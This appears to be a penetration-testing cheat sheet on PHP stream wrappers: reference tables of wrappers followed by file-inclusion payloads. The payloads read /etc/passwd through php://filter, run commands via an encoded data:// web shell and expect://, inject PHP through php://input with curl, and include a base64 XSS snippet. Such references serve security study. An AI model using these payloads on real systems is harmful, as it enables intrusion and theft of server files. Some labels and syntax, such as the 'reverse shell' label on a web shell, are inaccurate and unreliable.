Appearance
Wrappers โ
๐ Resource โ
๐ Global Wrappers (General Resource Access) โ
| Filter | Description |
|---|---|
php:// | PHP wrappers used with various function PHP I/O streams |
data:// | Embed data directly in a URI (Base64, text, etc.) |
file:// | Access to local files and directories |
zip:// | Access files inside a ZIP archive |
glob:// | Access files using a pattern or glob |
phar:// | Access compressed files in a PHAR archive (PHp ARchive) |
๐ Network Wrappers (Application Protocols) โ
| Filter | Description |
|---|---|
http(s):// | Access resources via HTTP or HTTPS |
ftp:// | Access files on an FTP server |
ws(s):// | Create a request to a WebSocket server |
gopher:// | Access Gopher servers (obsolete document retrieval protocol) |
dict:// | Query dictionary servers using DICT protocol (RFC 2229) |
โก Transport Wrappers (Low-Level Connection) โ
| Wrapper | Description |
|---|---|
tcp:// | Opens a TCP connection (used for HTTP, SMTP, etc.) |
udp:// | Opens a UDP connection (used for fast, stateless communication) |
ssl:// | Secure connection using SSL (requires OpenSSL) |
ssh2:// | Connect with SSH version 2 |
Write socket PATH : {PROTOCOL}://{DOMAIN}/{IP}:{PORT}
php
# Exemple socket wrapper with PHP function
# stream_socket_client() => tcp, stream_socket_server() => udp
# file_get_contents() => http(s), php, data, file, ftp, zip, phar, ssh2
# new WebSocket() => ws(s)data wrapper (RFC2387) โ
php
# Base64 Encoded Data
# data:text/plain;base64,aGVsbG8gd29ybGQ=
# Execute javascript from HTML
# data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==PHP - Wrappers โ
php:// is a warpper for accessing various I/O streams like :
php
print_r(stream_get_wrappers()); # list wrappers| Command | Description |
|---|---|
php://filter/convert.base64-encode/resource=/etc/passwd | PHP filter to convert file content to Base64 |
php://filter/resource=https://google.com | PHP filter for get google.com content |
curl -s -X POST "<?php base64_encode(include('index.php'))?>" "http://exemple.com/index.php?lang=php://input" | Put payload into php://input |
curl -s "http://127.0.0.1/index.php?language=expect://ls" | php://expect used PTY to executed command |
Payload execute with file_get_contents, require, include โ
php
# In php.ini, if "allow_url_include = Off", wrappers are disabled.
# file_get_contents() reads content as plain text, no execution (even if it's PHP code). => Path traversal
# include() and require() execute PHP code (wrappers must be enabled to inject PHP code). => LFI - RFI
# php://filter always returns the raw source code, never executes it.See more : LFI RFI exploit
Payloads โ
bash
# XSS payload
# data:text/plain;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
# Command Injection via LFI (only works with include() and require())
# data:application/x-httpd-php;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2B : reverse shell (?cmd=)
# data:text/plain,<?php echo shell_exec($_GET['cmd'])); ?>
# read content file
# php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
# extracting a file with multiple wrappers
# php://filter/convert.base64-encode/resource=file:///etc/passwdWrappers Payloads โ
bash
zip://malicious.zip%23exec.php&cmd=ls
http://example.com/?page=expect://ls
glob:///etc/*
file:///etc/passwd
gopher://gopher.floodgap.com
dict://dict.org/d:$word